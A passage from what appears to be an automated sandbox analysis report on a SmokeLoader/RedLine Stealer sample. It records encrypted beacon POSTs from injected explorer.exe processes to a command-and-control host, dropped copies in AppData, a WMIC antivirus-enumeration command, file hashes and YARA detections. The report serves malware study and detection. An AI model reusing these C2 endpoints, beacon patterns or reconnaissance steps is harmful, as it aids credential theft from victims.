34 d0 48 77 18 24 37 cd 54 9e 99 2d 50 03 4f 07 c0 8a 78 2c 4a 01 bd f1 98 06 fc ae 0a dc 43 dd ed e5 dc 7d c9 22 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[ALf4%<X\|T0\<-$vJ`[AySE>8{E%TtF9\Vd}]A[l]U\p@#OcWlwI3jIbu4Hw$7T-POx,JC}"
2024-10-03 00:53:31 UTC	287	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:53:31 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:53:31 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49783	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:32 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://esxqwevqdpc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: calvinandhalls.com
2024-10-03 00:53:32 UTC	344	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 5d ba 3a 8f b9 ab 12 0c b1 63 14 83 7c e8 9b 16 31 db 1e 12 6d a4 d1 d5 39 ab a1 57 1f c5 e0 3d 99 35 3c 8b fe 05 22 24 02 10 01 e1 17 92 da d9 28 8e e6 56 0e 4c f6 64 3b b0 21 5a de 9f 9d b9 59 77 ba 5f a2 68 ae 79 62 c0 4e ac 76 31 2e 28 41 e4 be 69 ee be 04 ea 13 08 81 cd 94 1d e0 fe 07 a1 c7 9e d1 16 5c c3 c8 a1 14 48 8a 0f 17 cf 74 12 53 b9 6d 20 37 ea 47 7e 4f d8 96 94 6c 55 94 b3 00 e7 29 c9 d5 a2 11 38 77 2d da 4b 05 71 29 10 b2 32 9f ac 7b 35 26 56 38 fe be 4c 20 57 53 9d c6 8e 35 cc dc 15 f0 21 87 b4 cc c7 6b 85 7a Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Lg4%<]:c\|1m9W=5<"$(VLd;!ZYw_hybNv1.(Ai\HtSm 7G~OlU)8w-Kq)2{5&V8L WS5!kz
2024-10-03 00:53:32 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:32 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49784	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:33 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jsjqksunoqiwyetj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: calvinandhalls.com
2024-10-03 00:53:33 UTC	212	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 53 d2 66 b6 80 db 21 11 e2 2b 06 b2 69 e2 ca 3a 6e c1 3f 35 64 a9 bc e8 3f ee c8 72 61 c6 a1 7d 9a 37 59 ee fc 5c 31 44 5b 44 22 9a 21 da e0 af 34 f2 a5 62 02 5d bd 62 3d d6 39 5d c6 c3 99 85 50 2c 84 0b a3 29 af 34 77 a0 4c d7 46 59 29 27 71 a4 e5 7b be 96 1c d6 0b 11 e9 d8 b4 37 ed 97 57 ae d9 99 a1 49 32 91 a7 d5 60 56 b1 05 0c e1 3a 13 53 8b 58 35 2c d5 3c 70 04 e7 c3 86 2f 59 98 a6 3a fd 63 aa Data Ascii: rljJ,ey1r3}u )6IP g3iqH[@Ld4%<Sf!+i:n?5d?ra}7Y\1D[D"!4b]b=9]P,)4wLFY)'q{7WI2`V:SX5,<p/Y:c
2024-10-03 00:53:33 UTC	278	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 00:53:33 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49785	23.145.40.162	443	6916	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:53:37 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://calvinandhalls.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 4431 Host: calvinandhalls.com
2024-10-03 00:53:37 UTC	4431	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad cf 1e c8 35 78 ec cf a1 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f Data Ascii: rljJ,ey1r3}unluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu\|5x:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
2024-10-03 00:53:38 UTC	287	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:53:38 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 409 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:53:38 UTC	409	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49791	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:54:53 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://imnavngaywaiojfw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 00:54:53 UTC	109	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 00:54:53 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:54:53 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:54:53 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49793	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:55:09 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jhrmvdleayp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 00:55:09 UTC	109	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 00:55:09 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:55:09 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:55:09 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49795	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:55:27 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://tcfngkdpgqhcen.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 00:55:27 UTC	109	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 00:55:27 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:55:27 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:55:27 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49797	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:55:44 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://kskwnlkfffwemep.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 00:55:44 UTC	109	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 00:55:44 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:55:44 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:55:44 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49799	23.145.40.162	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 00:56:00 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://wiquilejyybabo.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: calvinandhalls.com
2024-10-03 00:56:00 UTC	109	OUT	Data Raw: 72 19 f5 bf 8c 0c 1d 8c 6c f4 9d 6a 4a f7 15 2c db f7 b7 d5 65 79 31 f9 72 07 b3 96 e8 a4 33 e8 7d 9b b7 f2 75 8d ad 84 81 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4 Data Ascii: rljJ,ey1r3}u )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-03 00:56:00 UTC	285	IN	HTTP/1.1 404 Not Found Date: Thu, 03 Oct 2024 00:56:00 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 7 Content-Type: text/html; charset=utf-8 Connection: close
2024-10-03 00:56:00 UTC	7	IN	Data Raw: 03 00 00 00 1e 0d af Data Ascii:

Target ID:	0
Start time:	20:51:57
Start date:	02/10/2024
Path:	C:\Users\user\Desktop\v173TV3V11.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\v173TV3V11.exe"
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	C108169F00FF9C5AD6FA70DF9137E44A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	20:52:03
Start date:	02/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	20:52:23
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Roaming\bsjhhuh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\bsjhhuh
Imagebase:	0x400000
File size:	245'760 bytes
MD5 hash:	C108169F00FF9C5AD6FA70DF9137E44A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	20:52:53
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\C35.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C35.exe
Imagebase:	0x400000
File size:	245'248 bytes
MD5 hash:	31B228301D6FB368186C2D025311D1AF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:53:17
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Roaming\vejhhuh
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vejhhuh
Imagebase:	0xd30000
File size:	245'248 bytes
MD5 hash:	31B228301D6FB368186C2D025311D1AF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:53:29
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Temp\451E.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\451E.exe
Imagebase:	0x7ff763af0000
File size:	78'336 bytes
MD5 hash:	69C7186C5393D5E94294E39DA1D4D830
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	20:53:30
Start date:	02/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff7e14a0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	20:53:33
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xd50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:53:33
Start date:	02/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd
Imagebase:	0x7ff641da0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:53:33
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:53:34
Start date:	02/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	20:53:34
Start date:	02/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Imagebase:	0x7ff749240000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	20:53:35
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0xd50000
File size:	4'514'184 bytes
MD5 hash:	DD6597597673F72E10C9DE7901FBA0A8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	20:53:36
Start date:	02/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
